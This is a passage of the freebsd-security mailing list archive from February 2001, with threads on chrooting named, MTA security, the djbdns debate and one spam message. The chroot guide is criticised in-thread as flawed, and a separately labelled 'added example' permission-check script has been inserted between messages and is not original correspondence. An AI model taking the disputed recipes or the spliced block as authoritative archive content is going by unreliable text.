To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 7:40:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from veldy.net (w028.z064001117.msp-mn.dsl.cnc.net [64.1.117.28]) by hub.freebsd.org (Postfix) with ESMTP id EDD8F37B503 for ; Thu, 1 Feb 2001 07:40:40 -0800 (PST) Received: from HP2500B (veldy.net [64.1.117.28]) by veldy.net (Postfix) with SMTP id 282988C2C for ; Thu, 1 Feb 2001 09:40:13 -0600 (CST) Message-ID: <008c01c08c64$e07a3ee0$3028680a@tgt.com> From: "Thomas T. Veldhouse" To: Subject: ipmon and periodic Date: Thu, 1 Feb 2001 09:37:23 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Has anybody written a script or modified the current nightly periodic scripts to send ipmon output in the security email as is currently done for ipfw? I have switched to ipfilter and I would like to see my daily ipmon output - or at least the relevant stats. 
I would hate to replicate the work if it has already been done :) Tom Veldhouse veldy@veldy.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 7:52:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 1178B37B503 for ; Thu, 1 Feb 2001 07:52:08 -0800 (PST) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id KAA76230; Thu, 1 Feb 2001 10:51:36 -0500 (EST) (envelope-from wollman) Date: Thu, 1 Feb 2001 10:51:36 -0500 (EST) From: Garrett Wollman Message-Id: <200102011551.KAA76230@khavrinen.lcs.mit.edu> To: Neil Blakey-Milner Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind In-Reply-To: <20010201120218.A10087@rapier.smartspace.co.za> References: <200101312123.f0VLNL134920@freefall.freebsd.org> <20010201014819.H675@riget.scene.pl> <20010131200142.A90211@palomine.net> <200102010154.f111sYE23275@earth.backplane.com> <20010201120218.A10087@rapier.smartspace.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > It might be an idea to actually research djbdns, consider its design, > history, and coding standards, and then make a judgement. While you're doing that, also consider the guy who wrote it, and whether your view of the universe coincides with his. 
-GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 7:54:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 1300E37B684 for ; Thu, 1 Feb 2001 07:53:59 -0800 (PST) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id KAA76239; Thu, 1 Feb 2001 10:53:45 -0500 (EST) (envelope-from wollman) Date: Thu, 1 Feb 2001 10:53:45 -0500 (EST) From: Garrett Wollman Message-Id: <200102011553.KAA76239@khavrinen.lcs.mit.edu> To: Thomas Cannon Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind In-Reply-To: References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > I think the fact that he puts his own money on the fact that there are no > exploitable flaws in qmail or his DNS implementation shows an > obvious That would be an assertion, not a fact. (And keep in mind that the same person has threatened to sue anyone who suggests that there actually might be security flaws in his software.) 
-GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 7:55:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.sageian.com (ns.sage-consult.com [208.201.118.11]) by hub.freebsd.org (Postfix) with ESMTP id D1A4C37B491 for ; Thu, 1 Feb 2001 07:55:34 -0800 (PST) Received: from pricli012 (proxy.sageian.com [208.201.118.126]) by mail.sageian.com (Postfix) with SMTP id B8D9A6A904 for ; Thu, 1 Feb 2001 10:55:33 -0500 (EST) Message-ID: <03aa01c08c67$7f7c3320$4c00000a@sage> Reply-To: "Rossen Raykov" From: "Rossen Raykov" To: Subject: Ronning named in chroot env Date: Thu, 1 Feb 2001 10:56:11 -0500 Organization: SageConsult, Princeton MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, In case someone is interested in running named in a chrooted environment on FreeBSD, below is my experience of how this can be done. There are example settings for /etc/rc.conf also. I provide this information with no warranty of any kind. Use it at your own risk! First create the chroot directory where you will put named in. 
In the example settings I'll use /var/chroot/named

Create the following directories in it:
bin
dev
etc
etc/namedb
etc/namedb/* (depends on your named config)
lib
var
var/run
usr
usr/sbin
usr/libexec
usr/lib
tmp

Copy the following files in it:
bin/ldconfig (optional)
etc/passwd
etc/localtime
etc/group
etc/namedb/named.conf
etc/namedb/cache
etc/namedb/named.root
etc/namedb/* (depends on your zones)
var/run/named.pid (generated by named on startup so you do not need to copy it)
usr/sbin/named
usr/libexec/ld-elf.so.1
usr/libexec/named-xfer
usr/lib/libc.so.4
usr/lib/libutil.so.3

Links (depends on whether you are using the bind from the FreeBSD distribution or one from ports):
etc/named.conf -> namedb/named.conf

Create special file (mknod null c 2 2 root:wheel):
dev/null

Sockets (those will be created during runtime):
dev/log
var/run/ndc

Settings in /etc/rc.conf:
# Start named in chroot environment
named_enable="YES"
named_program="chroot"
named_flags="/var/chroot/named /usr/sbin/named -u bind -g bind"
# Create logging socket for named in the sandbox
syslogd_flags="-s -l /var/chroot/named/dev/log"

Notes about etc/passwd in the chrooted environment:
There is no good reason for this to be your real passwd file. Create something like:

root:*:0:0:Charlie &:/root:/bin/csh
bind:*:53:53:Bind Sandbox:/:/sbin/nologin

Keep the same UID for bind as in the original passwd file. Use pwd_mkdb to create the shadow password file. Do not simply copy the original one!

The group file can be something like:

wheel:*:0:root
bind:*:53:

Finally, be careful with the rights in the newly created directory structure. For this one can look at the rights and the ownership of the original ones.

To start named in the new environment - restart the box ;) or stop syslogd and start it with the options specified above:
syslogd -s -l /var/chroot/named/dev/log

Verify that syslog is working correctly (I have to restart it 2 times?!).

Start named:
chroot /var/chroot/named /usr/sbin/named -u bind -g bind

That's all! 
Rossen To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 8: 5:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id ED3FF37B503 for ; Thu, 1 Feb 2001 08:05:13 -0800 (PST) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.1/8.11.1) with ESMTP id f11G5vd82414; Thu, 1 Feb 2001 11:05:57 -0500 (EST) (envelope-from rsimmons@wlcg.com) Date: Thu, 1 Feb 2001 11:05:56 -0500 (EST) From: Rob Simmons To: Rossen Raykov Cc: freebsd-security@FreeBSD.ORG Subject: Re: Ronning named in chroot env In-Reply-To: <03aa01c08c67$7f7c3320$4c00000a@sage> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org You can keep the number of libs that you need to put in the chroot down by compiling bind statically. There is a website about this here: http://www.psionic.com/papers/dns/dns-openbsd/ If you are using the ports collection to build bind, just add the following line to the Makefile: CFLAGS= -static The site is primarily about OpenBSD, but things work (almost) the same in FreeBSD :) Robert Simmons Systems Administrator http://www.wlcg.com/ On Thu, 1 Feb 2001, Rossen Raykov wrote: > Hi, > > In case someone is interested in running named in chrooted environment on > FreeBSD, below is my experience how this can be done. > There are example settings for /etc/rc.conf allso. > > I provide this information with no warranty of any kind. > Use it on yours one risk! > > First create the chroot directory where you will put named in. 
> In the example settings I'll use /var/chroot/named > > Create the following directories in it: > bin > dev > etc > etc/namedb > etc/namedb/* (depends on you named config) > lib > var > var/run > usr > usr/sbin > usr/libexec > usr/lib > tmp > > Copy the following files in it: > > bin/ldconfig (optional) > etc/passwd > etc/localtime > etc/group > etc/namedb/named.conf > etc/namedb/cache > etc/namedb/named.root > etc/namedb/* (depends on you zones) > var/run/named.pid (generated by named on startup so you do not need to copy > it) > usr/sbin/named > usr/libexec/ld-elf.so.1 > usr/libexec/named-xfer > usr/lib/libc.so.4 > usr/lib/libutil.so.3 > > links (depend on are you using the bind from the FreeBSD distribution or one > from ports): > etc/named.conf -> namedb/named.conf > > Create special file (mknod null c 2 2 root:wheel): > dev/null > > Sockets (those will be created during runtime): > dev/log > var/run/ndc > > Settings in /etc/rc.conf > # Start named in chroot environment > named_enable="YES" > named_program="chroot" > named_flags="/var/chroot/named /usr/sbin/named -u bind -g bind" > # Create loging soket for named in the sandbox > syslogd_flags="-s -l /var/chroot/named/dev/log" > > Notes about etc/passwd in the chrooted environment: > There is not a good reason this to be you real passwd file. > Create something like: > > root:*:0:0:Charlie &:/root:/bin/csh > bind:*:53:53:Bind Sandbox:/:/sbin/nologin > > keep the same UID fro bind like in the original passwd file. > Use pwd_mkdb to create the shadow password file. > Do not simply copy the original one! > > group file can be something like: > > wheel:*:0:root > bind:*:53: > > Finally be careful with the rights in the newly created directory structure. > For this one can look at the rights and the ownership of the original ones. > > To start named in the new environment - restart the box ;) > or stop syslogd and start it with the options specified above. 
> > syslogd -s -l /var/chroot/named/dev/log > > Verify that syslog is working correctly (I have to restart it 2 times?!). > > start named: > chroot /var/chroot/named /usr/sbin/named -u bind -g bind > > That's all! > > Rossen > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 8:48:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from topsecret.net (unknown [216.19.133.97]) by hub.freebsd.org (Postfix) with SMTP id 256BB37B67D for ; Thu, 1 Feb 2001 08:48:05 -0800 (PST) Received: from pacific.net128.101.101.10.in-addr.arpa by topsecret.net with SMTP (MDaemon.v2.7.SP5.R) for ; Thu, 01 Feb 2001 11:46:29 -0500 Date: Thu, 1 Feb 2001 11:46:43 -0500 (EST) From: "[gill]" X-Sender: gill@pacific.int.topsecret.net To: Dragos Ruiu Cc: Christopher Farley , Fenix , freebsd-security@FreeBSD.ORG, freebsd-questions@FreeBSD.ORG Subject: Re: sendmail vs. postfix question In-Reply-To: <01020103331409.27656@smp.kyx.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-MDaemon-Deliver-To: freebsd-security@FreeBSD.ORG X-Return-Path: gill@topsecret.net Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org There was an interview with W Venema this week on http://securityportal.com/closet/closet20010131.html very interesting stuff. --gill -- This is my ~/.signature file. It is the digital equivalent of a bumpersticker. Remember? When you said: ->On Wed, 31 Jan 2001, Christopher Farley wrote: ->> Fenix (fenix@xs4some.net) wrote: ->> ->> > I have a little question about sendmail vs. postfix .... ->> > Are there any known recent problms with sendmail security ? ->> > what about postfix ? 
->> [snip snip snip] ->As far as security, given how much I rely on it, I recently(last year) decided ->to re-audit its code, and after a couple of days spent looking for format ->strings and other stuff I decided to discontinue the audit... Mr. Venema's code ->is so rigorous that it even passes _internal_ data between routines through ->filtering and cleaning functions (how paranoid is that :-) if that's any ->indication of how it's built up. -> ->I personally think very highly of it. (Besides, I really would be fine ->if I never have to look at another arcane sendmail ruleset ever ->again... :-P ) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 8:58:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from sasami.jurai.net (sasami.jurai.net [63.67.141.99]) by hub.freebsd.org (Postfix) with ESMTP id 79FA237B67D; Thu, 1 Feb 2001 08:58:21 -0800 (PST) Received: from localhost (scanner@localhost) by sasami.jurai.net (8.9.3/8.8.7) with ESMTP id LAA85518; Thu, 1 Feb 2001 11:58:12 -0500 (EST) Date: Thu, 1 Feb 2001 11:58:12 -0500 (EST) From: To: "[gill]" Cc: Dragos Ruiu , Christopher Farley , Fenix , freebsd-security@FreeBSD.ORG, freebsd-questions@FreeBSD.ORG Subject: Re: sendmail vs. postfix question In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 1 Feb 2001, [gill] wrote: > There was an interview with W Venema this week on > http://securityportal.com/closet/closet20010131.html That was a short but good read. I wish it would have been a bit longer. 
Oh and someone IS working on a Postfix book :-) ============================================================================= -Chris Watson (316) 326-3862 | FreeBSD Consultant, FreeBSD Geek Work: scanner@jurai.net | Open Systems Inc., Wellington, Kansas Home: scanner@deceptively.shady.org | http://open-systems.net ============================================================================= WINDOWS: "Where do you want to go today?" LINUX: "Where do you want to go tommorow?" BSD: "Are you guys coming or what?" ============================================================================= irc.openprojects.net #FreeBSD -Join the revolution! ICQ: 20016186 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 9: 2:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id DA69F37B67D for ; Thu, 1 Feb 2001 09:02:17 -0800 (PST) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id SAA31308; Thu, 1 Feb 2001 18:02:02 +0100 (CET) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "Rossen Raykov" Cc: Subject: Re: Ronning named in chroot env References: <03aa01c08c67$7f7c3320$4c00000a@sage> From: Dag-Erling Smorgrav Date: 01 Feb 2001 18:02:02 +0100 In-Reply-To: "Rossen Raykov"'s message of "Thu, 1 Feb 2001 10:56:11 -0500" Message-ID: Lines: 11 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Rossen Raykov" writes: > In case someone is interested in running named in chrooted environment on > FreeBSD, below is my experience how this can be done. 
> [good example of how not to do it]

Step-by-step instructions can be found starting about halfway through http://www.freebsd.org/cgi/getmsg.cgi?fetch=293748+0+current/freebsd-security

DES -- Dag-Erling Smorgrav - des@ofug.org

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Feb 1 9: 3:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from bluerose.windmoon.nu (c255152-a.plstn1.sfba.home.com [24.176.132.48]) by hub.freebsd.org (Postfix) with ESMTP id BE5AD37B69B for ; Thu, 1 Feb 2001 09:03:02 -0800 (PST) Received: from localhost (fengyue@localhost) by bluerose.windmoon.nu (8.11.1/8.10.2) with ESMTP id f11H2tD42146; Thu, 1 Feb 2001 09:02:55 -0800 (PST) Date: Thu, 1 Feb 2001 09:02:55 -0800 (PST) From: FengYue To: Rossen Raykov Cc: freebsd-security@FreeBSD.ORG Subject: Re: Ronning named in chroot env In-Reply-To: <03aa01c08c67$7f7c3320$4c00000a@sage> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Thu, 1 Feb 2001, Rossen Raykov wrote:
> Hi,
>
> In case someone is interested in running named in chrooted environment on
> FreeBSD, below is my experience how this can be done.
> There are example settings for /etc/rc.conf also.

Actually, all I did was:

named -t /etc/namedb -u bind -g bind named.conf

that seems to work just fine. Just make sure /etc/namedb/s and files under it are all owned by bind:bind. I'm using the named compiled from /usr/src/usr.sbin/named.
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 9:15:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 7092337B6A2 for ; Thu, 1 Feb 2001 09:15:25 -0800 (PST) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id SAA31404; Thu, 1 Feb 2001 18:15:17 +0100 (CET) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: FengYue Cc: Rossen Raykov , freebsd-security@FreeBSD.ORG Subject: Re: Ronning named in chroot env References: From: Dag-Erling Smorgrav Date: 01 Feb 2001 18:15:16 +0100 In-Reply-To: FengYue's message of "Thu, 1 Feb 2001 09:02:55 -0800 (PST)" Message-ID: Lines: 22 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org FengYue writes: > Actually, all I did was: > > named -t /etc/namedb -u bind -g bind named.conf > > that seems to work just fine. Only if your named.conf has 'directory "/";' in the options section, and you don't have any slave zones, and you're not interested in any log messages your name server produces. Come to think of it, the fact that named is now unable to log error messages is probably the reason why you think it works just fine :) > Just make sure /etc/namedb/s and files > under it are all owned by bind:bind. ...and for extra paranoia, make sure everything else in /etc/namedb is owned by root:wheel and not writable by anyone - maybe even schg. 
DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 9:26:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from bluerose.windmoon.nu (c255152-a.plstn1.sfba.home.com [24.176.132.48]) by hub.freebsd.org (Postfix) with ESMTP id C565137B491 for ; Thu, 1 Feb 2001 09:26:20 -0800 (PST) Received: from localhost (fengyue@localhost) by bluerose.windmoon.nu (8.11.1/8.10.2) with ESMTP id f11HQ6s42199; Thu, 1 Feb 2001 09:26:06 -0800 (PST) Date: Thu, 1 Feb 2001 09:26:06 -0800 (PST) From: FengYue To: Dag-Erling Smorgrav Cc: Rossen Raykov , freebsd-security@FreeBSD.ORG Subject: Re: Ronning named in chroot env In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 1 Feb 2001, Dag-Erling Smorgrav wrote: > Only if your named.conf has 'directory "/";' in the options section, > and you don't have any slave zones, and you're not interested in any > log messages your name server produces. Come to think of it, the fact > that named is now unable to log error messages is probably the reason > why you think it works just fine :) Yes, it doesn't have any slave zones, but I do miss the logs. I will use your patch then:) BTW, you have a typo for the link: http://people.freebsd.org/~des/software/> there is an extra '>' after software/ Thanks... 
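An added example, not code from this thread and not DES's patch: a small sh check for the layout FengYue describes (chroot root /etc/namedb, slave zones under /etc/namedb/s) against the two points DES raises above, namely that named.conf must say directory "/" once named runs with -t /etc/namedb, and that only the slave directory should be owned by (and writable for) the bind user while everything else stays root-owned and read-only. The owner names root and bind, the paths, and the shape of the options block are assumptions about the target host, which is why they are passed in as arguments rather than hard-coded.

```shell
#!/bin/sh
# Added example, not code from the thread: sanity checks for a named chroot
# laid out as FengYue describes (chroot root /etc/namedb, slave zones in
# /etc/namedb/s) against the points DES raises. Owner names are arguments
# because "root" and "bind" are assumptions about the target system.

# check_named_chroot ROOT SLAVE_DIR CONF_OWNER SLAVE_OWNER
# Prints each problem found; returns 0 when the layout passes.
check_named_chroot() {
    root=$1 slave=$2 conf_owner=$3 slave_owner=$4
    rc=0

    # 1. With named -t ROOT, named.conf is read as ROOT/named.conf and the
    #    "directory" option is resolved inside the chroot, so it must be "/".
    #    A directory of "/etc/namedb" would make named look for ROOT/etc/namedb.
    if ! grep -Eq '^[[:space:]]*directory[[:space:]]+"/"[[:space:]]*;' "$root/named.conf" 2>/dev/null; then
        echo "named.conf: expected 'directory \"/\";' in the options block"
        rc=1
    fi

    # 2. The slave directory must exist; it is where named writes transferred zones.
    if [ ! -d "$slave" ]; then
        echo "slave zone directory $slave is missing"
        rc=1
    fi

    # 3. Everything outside the slave directory belongs to CONF_OWNER and must
    #    not be group- or world-writable; otherwise a compromised named could
    #    rewrite its own configuration or zone data (-perm -020 / -002 test
    #    the group and other write bits).
    bad=$(find "$root" -path "$slave" -prune -o \
            \( ! -user "$conf_owner" -o -perm -020 -o -perm -002 \) -print)
    if [ -n "$bad" ]; then
        echo "outside $slave: not owned by $conf_owner or group/world writable:"
        echo "$bad"
        rc=1
    fi

    # 4. The slave directory and its contents belong to SLAVE_OWNER (the -u user).
    if [ -d "$slave" ]; then
        bad=$(find "$slave" ! -user "$slave_owner" -print)
        if [ -n "$bad" ]; then
            echo "inside $slave: not owned by $slave_owner:"
            echo "$bad"
            rc=1
        fi
    fi
    return $rc
}

# Usage on a real host (assumed names):
#   check_named_chroot /etc/namedb /etc/namedb/s root bind
if [ $# -eq 4 ]; then
    check_named_chroot "$1" "$2" "$3" "$4"
fi
```

What this does not cover is logging, which is DES's remaining point: inside the chroot there is no /var/run/log for named to open, so its syslog output is silently lost until syslogd is given an additional socket inside the chroot (FreeBSD's syslogd -l option) or the patch DES refers to is applied. Nothing here adds "schg"; that is a separate chflags step.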
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 10:13:32 2001 Delivered-To: freebsd-security@freebsd.org Received: from inetworx.pcgameauthority.com (154.160.20.216.fastpoint.net [216.20.160.154]) by hub.freebsd.org (Postfix) with ESMTP id B1D0437B491; Thu, 1 Feb 2001 10:13:08 -0800 (PST) Received: from maximus (maximus.pcgameauthority.com [192.168.10.4]) by inetworx.pcgameauthority.com (Postfix) with SMTP id 39BF29501; Thu, 1 Feb 2001 10:14:46 -0800 (PST) Message-ID: <001401c08c7a$bc3eb9a0$040aa8c0@pcgameauthority.com> Reply-To: "Andre Hall" From: "Andre Hall" To: , References: <20010201103331.L53804@kens.com> Subject: Re: sendmail vs. postfix question Date: Thu, 1 Feb 2001 10:13:53 -0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I thought this was just about Postfix and Sendmail. I do agree that Qmail is easy to setup as well. I will reiterate that my comments were in regards to the Postfix and Sendmail comparison so the argument is not null, it's valid. ----- Original Message ----- From: "Robin S. Socha" To: ; Sent: Thursday, February 01, 2001 7:33 AM Subject: Re: sendmail vs. postfix question > * Cliff Sarginson [010201 10:13]: > >> I once was faced with the same dilemma as you were. I finally decide > >> to the Postfix way have not regretted my decision one bit. It was > >> the easiest and fastest configuration I had experienced, a definite > >> plus over Sendmail. > > Null argument, since the same applies to every other MTA, particularly > qmail. > > > I want to endorse the comments below. > > No. You want to endorse this and fix your quoting. 
> And while we're at
> it, don't think for a minute about Cc:ing me:
> http://learn.to/edit_messages
>
> > The author of Postfix has produced a really solid, fast and
> > secure mail system. You may be interested to know he also
> > authored tcp-wrappers and the (in)famous satan program.
> > He also personally answers many of the questions on the
> > postfix-users@postfix.org mailing list.
>
> Wietse Venema is also extremely nice and friendly. /Un/fortunately, that
> has not much to do with security ;-) Anyway, postfix and qmail are
> indeed the MTAs of choice if you're looking for secure and fast ones. If
> you intend to run mailing lists, qmail's ezmlm is, however, /the/ #1
> choice. Reply-to set.
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Feb 1 10:26:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from hand.dotat.at (sfo-gw.covalent.net [207.44.198.62]) by hub.freebsd.org (Postfix) with ESMTP id A9C8737B684 for ; Thu, 1 Feb 2001 10:26:03 -0800 (PST) Received: from fanf by hand.dotat.at with local (Exim 3.20 #3) id 14OOPw-000Acb-00; Thu, 01 Feb 2001 18:25:12 +0000 Date: Thu, 1 Feb 2001 18:25:12 +0000 From: Tony Finch To: Neil Blakey-Milner Cc: Matt Dillon , Chris Johnson , Przemyslaw Frasunek , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind Message-ID: <20010201182512.R70673@hand.dotat.at> References: <200101312123.f0VLNL134920@freefall.freebsd.org> <20010201014819.H675@riget.scene.pl> <20010131200142.A90211@palomine.net> <200102010154.f111sYE23275@earth.backplane.com> <20010201120218.A10087@rapier.smartspace.co.za> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010201120218.A10087@rapier.smartspace.co.za>
Organization: Covalent Technologies, Inc Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Neil Blakey-Milner wrote: > >It might be an idea to actually research djbdns, consider its design, >history, and coding standards, and then make a judgement. If you do look at the code then I hope you really like magic numbers and shun comments and meaningful type names. Tony. -- f.a.n.finch fanf@covalent.net dot@dotat.at "Because all you of Earth are idiots!" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 11:41:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from cocoa.globalgold.co.uk (cocoa.globalgold.co.uk [212.250.240.8]) by hub.freebsd.org (Postfix) with ESMTP id 1B3D137B698; Thu, 1 Feb 2001 11:39:05 -0800 (PST) Received: from stephen (tnt-18-68.easynet.co.uk [212.134.224.68]) by cocoa.globalgold.co.uk (8.9.1/8.9.1) with SMTP id TAA08633; Thu, 1 Feb 2001 19:03:06 GMT From: "Mailer" To: Subject: Win a top of the range iMac, Palm Pilot or Discman Date: Thu, 1 Feb 2001 18:58:28 -0000 Message-ID: MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0026_01C08C80.F6699130" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0026_01C08C80.F6699130 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Connect to your future and start 2001 as a winner Win a top of the range iMac, Palm Pilot or Discman All you have to do to win is register with planetgraduate, the new international site for students, graduates and employers. 
Simply click here to get started Take just a few seconds to register and enter our draw to win either a Palm Pilot or Sony Discman. Take a few minutes more and enter your CV with planetgraduate's CV Builder and you could win the incredibly cool iMac and be connected to the Internet in a couple of clicks. Enter our prize draw today to win one of these top prizes:- A top of the range iMac One of two Palm Pilots One of three Portable CD players Discman iMac Palm Pilot PS Double your chances of winning a Discman or Palm Pilot by helping us let your friends know about this great competition. The draw will take place on Friday 23rd February 2001 Prizes may differ from models shown To unsubscribe from this email, reply to this email with the word 'unsubscribe' only in the subject line or send an email to unsubscribe@planetgraduate.com get a job now | study net . the village | relax & enjoy . top deals | behind the scenes contact us . privacy policy . terms of use . copyright
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Feb 1 11:57:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from ike-ext.ab.videon.ca (ike-ext.ab.videon.ca [206.75.216.35]) by hub.freebsd.org (Postfix) with SMTP id 4486437B491 for ; Thu, 1 Feb 2001 11:57:28 -0800 (PST) Received: (qmail 26048 invoked from network); 1 Feb 2001 19:57:27 -0000 Received: from unknown (HELO e5e0aftd3903e) ([24.108.62.177]) (envelope-sender ) by ike-ext.ab.videon.ca (qmail-ldap-1.03) with SMTP for ; 1 Feb 2001 19:57:27 -0000 Message-ID: <005301c08c89$33722260$b13e6c18@videon.ca> From: "Paul Andrews" To: References: <200101300909.f0U99qv87528@freefall.freebsd.org> Subject: Re: FreeBSD Ports Security Advisory: FreeBSD-SA-01:07.xfree86 Date: Thu, 1 Feb 2001 12:57:26 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: 